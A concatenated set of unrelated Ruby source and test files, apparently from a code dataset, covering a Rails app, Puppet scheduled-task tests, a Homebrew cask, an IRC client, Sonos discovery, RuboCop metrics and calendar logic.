#
# Use the `with` method to specify the specific attributes to match on the
# new record.
#
# @example
# get :new
# assigns(:thing).should be_a_new(Thing)
#
# post :create, :thing => { :name => "Illegal Value" }
# assigns(:thing).should be_a_new(Thing).with(:name => nil)
def be_a_new(model_class)
BeANew.new(model_class)
end
end
| 27.166667 | 101 | 0.636149 |
38afa890436d35b84e0ee2d24a903c4f3b55585f | 732 | # frozen_string_literal: true
module Pharos
module Configuration
class Bastion < Pharos::Configuration::Struct
attribute :address, Pharos::Types::Strict::String
attribute :user, Pharos::Types::Strict::String
attribute :ssh_key_path, Pharos::Types::Strict::String
attribute :ssh_port, Pharos::Types::Strict::Integer.default(22)
attribute :ssh_proxy_command, Pharos::Types::Strict::String
def host
@host ||= Host.new(attributes)
end
def method_missing(meth, *args)
host.respond_to?(meth) ? host.send(meth, *args) : super
end
def respond_to_missing?(meth, include_private = false)
host.respond_to?(meth) || super
end
end
end
end
| 28.153846 | 69 | 0.668033 |
bbc69bb0283e6e72b31f1303f6d7e992f88c169e | 1,254 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module PolitigoBackend
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 34.833333 | 82 | 0.775917 |
28cb737cf9588d8282ae00b5793d38844d4d77c2 | 652 | # Copyright 2011, Dell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Everyone needs chef-client running - redhat doesn't chkconfig this by default.
| 34.315789 | 80 | 0.76227 |
625242affda5b7e9f0e5b2f91eb26a3d72300006 | 757 | cask 'app-tamer' do
version '2.3.3'
sha256 '9fe9bda04d2dd33c83598fa90fe579631be79e1bb1c473c10d17d2a157a977af'
url "https://www.stclairsoft.com/download/AppTamer-#{version}.dmg"
appcast 'https://www.stclairsoft.com/cgi-bin/sparkle.cgi?AT',
checkpoint: 'bb25b0c3eb8ae2c2df14d62fa01e6c2a987cae7b0dfcc280b51e7cf4d7f426e6'
name 'AppTamer'
homepage 'https://www.stclairsoft.com/AppTamer/'
app 'App Tamer.app'
zap delete: [
'/Library/LaunchDaemons/com.stclairsoft.AppTamerAgent.plist',
'/Library/PrivilegedHelperTools/com.stclairsoft.AppTamerAgent',
'~/Library/Caches/com.stclairsoft.AppTamer',
'~/Library/Preferences/com.stclairsoft.AppTamer.plist',
]
end
| 37.85 | 88 | 0.698811 |
08385bd132d687e36ff6f91f1125a3a4a0c91038 | 6,724 | require 'spec_helper_acceptance'
describe 'Should create a scheduled task' do
username, password = add_test_user
username2, password2 = add_test_user
let(:username) { username }
let(:username2) { username2 }
let(:password) { password }
let(:password2) { password2 }
let!(:taskname) { "pl#{rand(999_999).to_i}" }
after(:all) do
remove_test_user(username)
remove_test_user(username2)
end
after(:each) do
run_shell("schtasks.exe /delete /tn #{taskname} /f", accept_all_exit_codes: true) do |r|
# Empty means deletion was ok. The 'The system cannot find the file specified' error occurs
# if the task does not exist
unless r.stderr.empty? || r.stderr =~ %r{ERROR: The system cannot find the .+ specified}
raise r.stderr
end
end
end
it 'creates a task if it does not exist: taskscheduler_api2', tier_high: true do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
compatibility => 1,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'taskscheduler_api2'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Ensure it's idempotent
apply_manifest(pp, catch_changes: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd)
end
it 'creates a task if it does not exist: win32_taskscheduler', tier_high: true do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
compatibility => 1,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Ensure it's idempotent
apply_manifest(pp, catch_changes: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd)
end
it 'creates a task with a username and password: taskscheduler_api2' do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
end
it 'creates a task with a username and password: win32_taskscheduler' do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
end
it "updates a task's credentials: win32_taskscheduler" do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
compatibility => 1,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username2}',
password => '#{password2}',
trigger => {
schedule => daily,
start_time => '12:00',
},
provider => 'win32_taskscheduler'
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username2}})
end
end
it "updates a task's credentials: taskscheduler_api2" do
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username}',
password => '#{password}',
trigger => {
schedule => daily,
start_time => '12:00',
},
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username}})
end
pp = <<-MANIFEST
scheduled_task {'#{taskname}':
ensure => present,
command => 'c:\\\\windows\\\\system32\\\\notepad.exe',
arguments => "foo bar baz",
working_dir => 'c:\\\\windows',
user => '#{username2}',
password => '#{password2}',
trigger => {
schedule => daily,
start_time => '12:00',
},
}
MANIFEST
apply_manifest(pp, catch_failures: true)
# Verify the task exists
query_cmd = "schtasks.exe /query /v /fo list /tn #{taskname}"
run_shell(query_cmd) do |result|
expect(result.stdout).to match(%r{#{username2}})
end
end
end
| 30.017857 | 98 | 0.563504 |
08e04c1d9037bed90340dbcad7f611adb3f93248 | 2,495 | class PresetsController < ApplicationController
require 'net/http'
require 'json'
require 'util'
def get_preset(id)
query = {
'query' => ActiveSupport::JSON.encode({'_id' => id}),
}
http = create_api_conn()
res = http.get("/presets/?#{query.to_query}")
return ActiveSupport::JSON.decode(res.body)[0]
end
def find_presets(query, skip = 0, limit = Rails.configuration.page_size)
q = {
'query' => ActiveSupport::JSON.encode(query),
'skip' => skip,
'limit' => limit
}
http = create_api_conn()
res = http.get("/presets/?#{q.to_query}")
@total = res['Total'].to_i
return ActiveSupport::JSON.decode(res.body)
end
# GET /presets
# GET /presets.json
def index
can?(:read, 'presets') do
filters = nil
skip = params.include?(:page) ? (Integer(params[:page]) - 1) * Rails.configuration.page_size : 0
@presets = find_presets(filters, skip)
respond_to do |format|
format.html # index.html.erb
format.json { render json: @presets }
end
end
end
# GET /presets/new
# GET /presets/new.json
def new
can?(:create, 'presets') do
@preset = {}
respond_to do |format|
format.html # new.html.erb
format.json { render json: @preset }
end
end
end
# GET /presets/1/edit
def edit
can?(:update, 'presets') do
@preset = get_preset(params[:id]) || {}
end
end
# PUT /presets/1
# PUT /presets/1.json
def update
can?(:update, 'presets') do
preset = {}
preset['weight'] = params['weight'].to_i
preset['precondition'] = params['query']
preset['configurations'] = ActiveSupport::JSON.decode(params['configurations'])
http = create_api_conn()
res = http.put("/presets/#{URI.escape(params['name'].strip)}", ActiveSupport::JSON.encode(preset))
if res.code == '200'
flash[:success] = 'Preset saved'
else
flash[:error] = "Unexpected error (#{res.code}): #{res.body}"
end
redirect_to :action => :index
end
end
# DELETE /presets/1
# DELETE /presets/1.json
def destroy
can?(:delete, 'presets') do
http = create_api_conn()
res = http.delete("/presets/#{URI.escape(params[:id])}", nil)
if res.code == '200'
flash[:success] = 'Preset deleted'
else
flash[:error] = "Unexpected error (#{res.code}): #{res.body}"
end
redirect_to :action => :index
end
end
end
| 24.70297 | 104 | 0.591182 |
79ed3c8eceb3f272e1526028afafaf502d213331 | 4,213 | # frozen_string_literal: true
module RuboCop
module Cop
module Metrics
module Utils
# > ABC is .. a software size metric .. computed by counting the number
# > of assignments, branches and conditions for a section of code.
# > http://c2.com/cgi/wiki?AbcMetric
#
# We separate the *calculator* from the *cop* so that the calculation,
# the formula itself, is easier to test.
class AbcSizeCalculator
include IteratingBlock
include RepeatedCsendDiscount
# > Branch -- an explicit forward program branch out of scope -- a
# > function call, class method call ..
# > http://c2.com/cgi/wiki?AbcMetric
BRANCH_NODES = %i[send csend yield].freeze
# > Condition -- a logical/Boolean test, == != <= >= < > else case
# > default try catch ? and unary conditionals.
# > http://c2.com/cgi/wiki?AbcMetric
CONDITION_NODES = CyclomaticComplexity::COUNTED_NODES.freeze
def self.calculate(node)
new(node).calculate
end
# TODO: move to rubocop-ast
ARGUMENT_TYPES = %i[arg optarg restarg kwarg kwoptarg kwrestarg blockarg].freeze
private_constant :BRANCH_NODES, :CONDITION_NODES, :ARGUMENT_TYPES
def initialize(node)
@assignment = 0
@branch = 0
@condition = 0
@node = node
reset_repeated_csend
end
def calculate
@node.each_node do |child|
@assignment += 1 if assignment?(child)
if branch?(child)
evaluate_branch_nodes(child)
elsif condition?(child)
evaluate_condition_node(child)
end
end
[
Math.sqrt(@assignment**2 + @branch**2 + @condition**2).round(2),
"<#{@assignment}, #{@branch}, #{@condition}>"
]
end
def evaluate_branch_nodes(node)
if node.comparison_method?
@condition += 1
else
@branch += 1
@condition += 1 if node.csend_type? && !discount_for_repeated_csend?(node)
end
end
def evaluate_condition_node(node)
@condition += 1 if else_branch?(node)
@condition += 1
end
def else_branch?(node)
%i[case if].include?(node.type) &&
node.else? &&
node.loc.else.is?('else')
end
private
def assignment?(node)
return compound_assignment(node) if node.masgn_type? || node.shorthand_asgn?
node.for_type? ||
(node.respond_to?(:setter_method?) && node.setter_method?) ||
simple_assignment?(node) ||
argument?(node)
end
def compound_assignment(node)
# Methods setter can not be detected for multiple assignments
# and shorthand assigns, so we'll count them here instead
children = node.masgn_type? ? node.children[0].children : node.children
will_be_miscounted = children.count do |child|
child.respond_to?(:setter_method?) &&
!child.setter_method?
end
@assignment += will_be_miscounted
false
end
def simple_assignment?(node)
if !node.equals_asgn?
false
elsif node.lvasgn_type?
reset_on_lvasgn(node)
capturing_variable?(node.children.first)
else
true
end
end
def capturing_variable?(name)
name && !/^_/.match?(name)
end
def branch?(node)
BRANCH_NODES.include?(node.type)
end
def argument?(node)
ARGUMENT_TYPES.include?(node.type) && capturing_variable?(node.children.first)
end
def condition?(node)
return false if iterating_block?(node) == false
CONDITION_NODES.include?(node.type)
end
end
end
end
end
end
| 30.309353 | 90 | 0.538571 |
bf32a231e3dd88cb624843157d911e2677f11786 | 540 | class User < ActiveRecord::Base
has_many :offers
# Include default devise modules. Others available are:
# :token_authenticatable, :confirmable,
# :lockable, :timeoutable and :omniauthable
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable
# Setup accessible (or protected) attributes for your model
attr_accessible :email, :password, :password_confirmation, :remember_me
attr_accessible :address, :description, :name
validates :name, presence: true
end
| 33.75 | 73 | 0.755556 |
08b2ecfb6249ab7338e6a0e5da42c8ba7ea46e68 | 3,380 | # -*- encoding : utf-8 -*-
require File.dirname(__FILE__) + '/test_helper.rb'
require 'irc_connector'
describe "Disconnected connector" do
before(:each) do
@socket = double()
@connector = IrcConnector.new("server", 6667, "nick", "username", "real name", ["#first", "#second"])
expect(@connector).to receive(:create_socket).and_return(@socket)
end
it "register to irc server and join channels on connect" do
expect(@socket).to receive(:send).with("USER username username username :real name\n", 0)
expect(@socket).to receive(:send).with("NICK nick\n", 0)
expect(@socket).to receive(:send).with("JOIN #second\n", 0)
expect(@socket).to receive(:send).with("JOIN #first\n", 0)
@connector.connect
end
end
describe "Connected connector" do
before(:each) do
@socket = double()
@connector = IrcConnector.new("server", 6667, "nick", "username", "real name", ["#first", "#second"])
@connector.set_socket(@socket)
end
it "remove additional line changes when sending" do
expect(@socket).to receive(:send).with("message with line feeds removed\n", 0)
@connector.send("message \nwith\r \nline\r\n feeds removed\r\n\n")
end
it "send privmsg" do
expect(@socket).to receive(:send).with("PRIVMSG target :hello, world\n", 0)
@connector.privmsg("target", "hello, world")
end
it "reply with pong to ping" do
expect(@socket).to receive(:send).with("PONG :12345\n", 0)
msg = @connector.handle_server_input("PING :12345")
expect(msg.msg_type).to eq(IrcMsg::PING)
end
it "detect privmsg to channel" do
privmsg = ":[email protected] PRIVMSG #channel :text and more text"
msg = @connector.handle_server_input(privmsg)
expect(msg.msg_type).to eq(IrcMsg::PRIVMSG)
expect(msg.from).to eq("nickname")
expect(msg.target).to eq("#channel")
expect(msg.text).to eq("text and more text")
end
it "detect privmsg to individual user" do
privmsg = ":[email protected] PRIVMSG target_nick :text and more text"
msg = @connector.handle_server_input(privmsg)
expect(msg.msg_type).to eq(IrcMsg::PRIVMSG)
expect(msg.from).to eq("nickname")
expect(msg.target).to eq("target_nick")
expect(msg.text).to eq("text and more text")
end
it "handle unexpected input" do
raw_msg = "SOME MESSAGE :from irc server that is invalid"
msg = @connector.handle_server_input(raw_msg)
expect(msg.msg_type).to eq(IrcMsg::UNHANDLED)
expect(msg.raw_msg).to eq(raw_msg)
end
it "detect that there are no new messages when select returns nil" do
expect(IO).to receive(:select).and_return(nil)
msg = @connector.read_input
expect(msg.msg_type).to eq(IrcMsg::NO_MSG)
end
it "detect that there are no new messages when select returns empty list" do
expect(IO).to receive(:select).and_return([[]])
msg = @connector.read_input
expect(msg.msg_type).to eq(IrcMsg::NO_MSG)
end
it "detect disconnection" do
ready = [[@socket]]
expect(IO).to receive(:select).and_return(ready)
expect(@socket).to receive(:eof).and_return(true)
msg = @connector.read_input
expect(msg.msg_type).to eq(IrcMsg::DISCONNECTED)
end
it "handle message" do
expect(@connector).to receive(:handle_server_input).with("a message")
ready = [[@socket]]
expect(IO).to receive(:select).and_return(ready)
expect(@socket).to receive(:eof).and_return(false)
expect(@socket).to receive(:gets).and_return("a message")
@connector.read_input
end
end
| 34.489796 | 102 | 0.719231 |
21762b66ab8935546a302b13a2a82cd8adb24843 | 346 | module UsersHelper
# Returns the Gravatar for the given user.
def gravatar_for(user)
gravatar_id = Digest::MD5::hexdigest(user.email.downcase)
gravatar_url = "https://secure.gravatar.com/avatar/#{gravatar_id}"
image_tag(gravatar_url, alt: user.username, class: "gravatar")
end
def get_user(uid)
User.find(uid)
end
end
| 24.714286 | 70 | 0.719653 |
e9a3e3912d929abf59fa374baf45db83d4dcb96d | 1,821 | require 'json'
require 'helpers/acceptance/tests/manifest_shared_examples'
shared_examples 'basic acceptance tests' do |es_config|
include_examples('manifest application')
describe package("elasticsearch#{v[:oss] ? '-oss' : ''}") do
it { should be_installed
.with_version(v[:elasticsearch_full_version]) }
end
%w[
/etc/elasticsearch
/usr/share/elasticsearch
/var/lib/elasticsearch
].each do |dir|
describe file(dir) do
it { should be_directory }
end
end
describe 'resources' do
describe service('elasticsearch') do
it { send(es_config.empty? ? :should_not : :should, be_enabled) }
it { send(es_config.empty? ? :should_not : :should, be_running) }
end
unless es_config.empty?
describe file(pid_file) do
it { should be_file }
its(:content) { should match(/[0-9]+/) }
end
describe file('/etc/elasticsearch/elasticsearch.yml') do
it { should be_file }
it { should contain "name: #{es_config['node.name']}" }
end
end
unless es_config.empty?
es_port = es_config['http.port']
describe port(es_port) do
it 'open', :with_retries do
should be_listening
end
end
describe server :container do
describe http("http://localhost:#{es_port}/_nodes/_local") do
it 'serves requests', :with_retries do
expect(response.status).to eq(200)
end
it 'uses the default data path', :with_retries do
json = JSON.parse(response.body)['nodes'].values.first
data_dir = ['/var/lib/elasticsearch']
expect(
json['settings']['path']
).to include(
'data' => data_dir
)
end
end
end
end
end
end
| 26.779412 | 71 | 0.598572 |
08aeb5e733c19136f47b9c2a109eac4ae57131e7 | 1,832 | class NotificationData
attr_reader :title, :body, :extra, :icon, :link, :notification
def initialize(notification)
@notification = notification
@notifyable = notification.notifyable
if @notification.notifyable_type == 'EventUser'
init_event_user
elsif @notification.notifyable_type == 'EventSignup'
init_closing
end
end
def for_serializer
{ title: title, body: MarkdownHelper.markdown(body), extra: extra }
end
def android_data
{ title: title, body: MarkdownHelper.markdown_plain(body), notId: notification.id }
end
def ios_notification
{ title: title, body: MarkdownHelper.markdown_plain(body) }
end
def ios_data
{ notification_id: notification.id }
end
private
def init_event_user
@title = @notifyable.event.title
@link = @notifyable.event
if @notification.mode == 'position'
init_position
elsif @notification.mode == 'reminder'
init_reminder
end
end
def init_position
@icon = 'hashtag'
if @notifyable.reserve?
@body = I18n.t('model.notification_data.reserve_position', event: @notifyable.event)
else
@body = I18n.t('model.notification_data.attending', event: @notifyable.event)
end
if @notifyable.event_signup.notification_message.present?
@extra = @notifyable.event_signup.notification_message
end
end
def init_reminder
@icon = 'calendar'
@body = I18n.t('model.notification_data.remind_soon_starting',
event: @notifyable.event,
time: I18n.l(@notifyable.event.starts_at))
end
def init_closing
@icon = 'calendar'
@body = I18n.t('model.notification_data.remind_signup_soon_closing',
event: @notifyable.event,
time: I18n.l(@notifyable.event.signup.closes))
end
end
| 25.802817 | 90 | 0.680131 |
1821965aa22425cf53b8d9ce87eaf3c4a8c75334 | 907 | class TokyoMetro::Factory::Seed::Static::Station::RailwayLines < TokyoMetro::Factory::Seed::Static::RailwayLine::Hash
include ::TokyoMetro::ClassNameLibrary::Static::Station
private
def set_array_to_seed(h)
@h = h
end
def seed_main_infos
@h.each do | railway_line , in_each_railway_line |
puts " " * 4 * ( @indent + 1 ) + "※ #{ railway_line }"
puts ""
in_each_railway_line.seed( railway_line , @indent + 2 )
end
end
def seed_instance_for_escaping_undefined
puts "seed_instance_for_escaping_undefined"
self.class.db_instance_class.find_or_create_by(
same_as: "odpt.Station:Undefined" ,
name_ja: "未定義" ,
name_en: "Undefined" ,
railway_line_info_id: ::Railway::Line::Info.find_by( same_as: "odpt.Railway:Undefined" ).id ,
operator_info_id: ::Operator::Info.find_by( same_as: "odpt.Operator:Undefined" ).id
)
end
end
| 29.258065 | 117 | 0.68688 |
61f8fdbaafa2cc2fc815d799de2cc1425756112d | 1,878 | FactoryGirl.define do
sequence :name do |n|
"Foo bar #{n}"
end
sequence :email do |n|
"person#{n}@example.com"
end
sequence :uid do |n|
"#{n}"
end
sequence :permalink do |n|
"foo_page_#{n}"
end
factory :user do |f|
f.name "Foo bar"
f.email { generate(:email) }
end
factory :credi_card do |f|
f.subscription_id { generate(:uid) }
f.association :user, factory: :user
f.last_digits '1235'
f.card_brand 'visa'
end
factory :category do |f|
f.name_pt { generate(:name) }
end
factory :bank do |f|
f.name { generate(:uid) }
f.code '237'
end
factory :bank_account do |f|
f.association :bank
f.account '25334'
f.account_digit '2'
f.agency '1432'
f.agency_digit '2'
f.owner_name 'Lorem amenori'
f.owner_document '11111111111'
end
factory :project do |f|
f.name "Foo bar"
f.permalink { generate(:permalink) }
f.association :user, factory: :user
f.association :category, factory: :category
f.about_html "Foo bar"
f.headline "Foo bar"
f.goal 10000
f.online_date Time.now
f.online_days 5
f.video_url 'http://vimeo.com/17298435'
f.state 'online'
end
factory :contribution do |f|
f.association :project, factory: :project
f.association :user, factory: :user
f.value 10.00
f.payer_name 'Foo Bar'
f.payer_email '[email protected]'
f.anonymous false
after :create do |contribution|
create(:payment, paid_at: Time.now, gateway_id: '1.2.3', state: 'paid', value: contribution.value, contribution: contribution)
end
end
factory :payment do |f|
f.association :contribution
f.gateway 'pagarme'
f.value 10.00
f.state 'paid'
f.installment_value nil
f.payment_method "CartaoDeCredito"
after :build do |payment|
payment.gateway = 'pagarme'
end
end
end
| 21.101124 | 132 | 0.635783 |
287dd5f113e73467188a1013fd0efcef47bbdf4a | 87 | module Ires
module Mode
RESIZE = 0
CROP = 1
RESIZE_TO_CROP = 2
end
end
| 10.875 | 22 | 0.609195 |
2135afcc0bf8695b1fa57d95b546f0764832fad6 | 2,506 | require 'socket'
require 'ipaddr'
require 'timeout'
require 'sonos/topology_node'
#
# Inspired by https://github.com/rahims/SoCo, https://github.com/turboladen/upnp,
# and http://onestepback.org/index.cgi/Tech/Ruby/MulticastingInRuby.red.
#
# Turboladen's uPnP work is super-smart, but doesn't seem to work with 1.9.3 due to soap4r dep's.
#
# Some day this nonsense should be asynchronous / nonblocking / decorated with rainbows.
#
module Sonos
class Discovery
MULTICAST_ADDR = '239.255.255.250'
MULTICAST_PORT = 1900
DEFAULT_TIMEOUT = 2
attr_reader :timeout
attr_reader :first_device_ip
attr_reader :default_ip
def initialize(timeout = DEFAULT_TIMEOUT, default_ip = nil)
@timeout = timeout
@default_ip = default_ip
initialize_socket
end
# Look for Sonos devices on the network and return the first IP address found
# @return [String] the IP address of the first Sonos device found
def discover
send_discovery_message
@first_device_ip = listen_for_responses
end
# Find all of the Sonos devices on the network
# @return [Array] an array of TopologyNode objects
def topology
self.discover unless @first_device_ip
return [] unless @first_device_ip
doc = Nokogiri::XML(open("http://#{@first_device_ip}:#{Sonos::PORT}/status/topology"))
doc.xpath('//ZonePlayers/ZonePlayer').map do |node|
TopologyNode.new(node)
end
end
private
def send_discovery_message
# Request announcements
@socket.send(search_message, 0, MULTICAST_ADDR, MULTICAST_PORT)
end
def listen_for_responses
begin
Timeout::timeout(timeout) do
loop do
message, info = @socket.recvfrom(2048)
# return the IP address
return info[2]
end
end
rescue Timeout::Error => ex
puts 'Timed out...'
puts 'Switching to the default IP' if @default_ip
return @default_ip
end
end
def initialize_socket
# Create a socket
@socket = UDPSocket.open
# We're going to use IP with the multicast TTL
@socket.setsockopt(Socket::Option.new(:INET, :IPPROTO_IP, :IP_MULTICAST_TTL, 2.chr))
end
def search_message
[
'M-SEARCH * HTTP/1.1',
"HOST: #{MULTICAST_ADDR}:reservedSSDPport",
'MAN: ssdp:discover',
"MX: #{timeout}",
"ST: urn:schemas-upnp-org:device:ZonePlayer:1"
].join("\n")
end
end
end
| 27.23913 | 97 | 0.657223 |
38574e3d557464d627a9666c53a0802eebf6c033 | 715 | describe Travis::Api::Serialize::V2::Http::Permissions do
include Travis::Testing::Stubs
let(:permissions) do
[
stub(:repository_id => 1, :admin? => true, :pull? => false, :push? => false),
stub(:repository_id => 2, :admin? => false, :pull? => true, :push? => false),
stub(:repository_id => 3, :admin? => false, :pull? => false, :push? => true)
]
end
let(:data) { described_class.new(permissions).data }
it 'permissions' do
data['permissions'].should == [1, 2, 3]
end
it 'finds admin perms' do
data['admin'].should == [1]
end
it 'finds pull perms' do
data['pull'].should == [2]
end
it 'finds push perms' do
data['push'].should == [3]
end
end
| 23.064516 | 83 | 0.586014 |
b92774edceb907a55a56d35cbe627825b12fef21 | 732 | class Valvat
module Utils
EU_COUNTRIES = %w(AT BE BG CY CZ DE DK EE ES FI FR GB GR HU IE IT LT LU LV MT NL PL PT RO SE SI SK)
COUNTRY_PATTERN = /\A([A-Z]{2})(.+)\Z/
NORMALIZE_PATTERN = /[-\.:_\s,;]+/
def self.split(vat)
COUNTRY_PATTERN =~ vat
result = [$1, $2]
iso_country = vat_country_to_iso_country(result[0])
EU_COUNTRIES.include?(iso_country) ? result : [nil, nil]
end
def self.normalize(vat)
vat.upcase.gsub(NORMALIZE_PATTERN, "")
end
def self.vat_country_to_iso_country(vat_country)
vat_country == "EL" ? "GR" : vat_country
end
def self.iso_country_to_vat_country(iso_country)
iso_country == "GR" ? "EL" : iso_country
end
end
end
| 26.142857 | 103 | 0.631148 |
4a8b84d77957d047198b7ab311e48a9133c3969c | 5,111 | # encoding: utf-8
require_relative "../test_helper"
class CalendarTest < ActiveSupport::TestCase
context "finding a calendar by slug" do
should "construct a calendar with the slug and data from the corresponding JSON file" do
data_from_json = JSON.parse(File.read(Rails.root.join(Calendar::REPOSITORY_PATH, "single-calendar.json")))
Calendar.expects(:new).with("single-calendar", data_from_json).returns(:a_calendar)
cal = Calendar.find("single-calendar")
assert_equal :a_calendar, cal
end
should "raise exception when calendar doesn't exist" do
assert_raises Calendar::CalendarNotFound do
Calendar.find("non-existent")
end
end
end
should "return the slug" do
assert_equal "a-slug", Calendar.new("a-slug", {}).slug
end
should "return the slug for to_param" do
assert_equal "a-slug", Calendar.new("a-slug", {}).to_param
end
context "divisions" do
setup do
@cal = Calendar.new("a-calendar", "title" => "UK bank holidays",
"divisions" => {
"kablooie" => {
"2012" => [1],
"2013" => [3],
},
"fooey" => {
"2012" => [1, 2],
"2013" => [3, 4],
},
"gooey" => {
"2012" => [2],
"2013" => [4],
},
})
end
should "construct a division for each one in the data" do
Calendar::Division.expects(:new).with("kablooie", "2012" => [1], "2013" => [3]).returns(:kablooie)
Calendar::Division.expects(:new).with("fooey", "2012" => [1, 2], "2013" => [3, 4]).returns(:fooey)
Calendar::Division.expects(:new).with("gooey", "2012" => [2], "2013" => [4]).returns(:gooey)
assert_equal %i[kablooie fooey gooey], @cal.divisions
end
should "cache the constructed instances" do
first = @cal.divisions
Calendar::Division.expects(:new).never
assert_equal first, @cal.divisions
end
context "finding a division by slug" do
should "return the division with the matching slug" do
div = @cal.division("fooey")
assert_equal Calendar::Division, div.class
assert_equal "Fooey", div.title
end
should "raise exception when division doesn't exist" do
assert_raises Calendar::CalendarNotFound do
@cal.division("non-existent")
end
end
end
end
context "events" do
setup do
@divisions = []
@calendar = Calendar.new("a-calendar")
@calendar.stubs(:divisions).returns(@divisions)
end
should "merge events for all years into single array" do
@divisions << stub("Division1", events: [1, 2])
@divisions << stub("Division2", events: [3, 4, 5])
@divisions << stub("Division3", events: [6, 7])
assert_equal [1, 2, 3, 4, 5, 6, 7], @calendar.events
end
should "handle years with no events" do
@divisions << stub("Division1", events: [1, 2])
@divisions << stub("Division2", events: [])
@divisions << stub("Division3", events: [6, 7])
assert_equal [1, 2, 6, 7], @calendar.events
end
end
context "attribute accessors" do
setup do
@cal = Calendar.new("a-calendar", "title" => "UK bank holidays",
"description" => "UK bank holidays description")
end
should "have an accessor for the title" do
assert_equal "UK bank holidays", @cal.title
end
should "have an accessor for the description" do
assert_equal "UK bank holidays description", @cal.description
end
end
context "show_bunting?" do
setup do
@cal = Calendar.new("a-calendar")
end
should "be true when one division is buntable" do
@div1 = stub("Division", show_bunting?: true)
@div2 = stub("Division", show_bunting?: false)
@div3 = stub("Division", show_bunting?: false)
@cal.stubs(:divisions).returns([@div1, @div2, @div3])
assert @cal.show_bunting?
end
should "be true when more than one division is buntable" do
@div1 = stub("Division", show_bunting?: true)
@div2 = stub("Division", show_bunting?: true)
@div3 = stub("Division", show_bunting?: false)
@cal.stubs(:divisions).returns([@div1, @div2, @div3])
assert @cal.show_bunting?
end
should "be false when no divisions are buntable" do
@div1 = stub("Division", show_bunting?: false)
@div2 = stub("Division", show_bunting?: false)
@div3 = stub("Division", show_bunting?: false)
@cal.stubs(:divisions).returns([@div1, @div2, @div3])
assert_not @cal.show_bunting?
end
end
context "as_json" do
setup do
@div1 = stub("Division", slug: "division-1", as_json: "div1 json")
@div2 = stub("Division", slug: "division-2", as_json: "div2 json")
@cal = Calendar.new("a-calendar")
@cal.stubs(:divisions).returns([@div1, @div2])
end
should "construct a hash representation of all divisions" do
expected = {
"division-1" => "div1 json",
"division-2" => "div2 json",
}
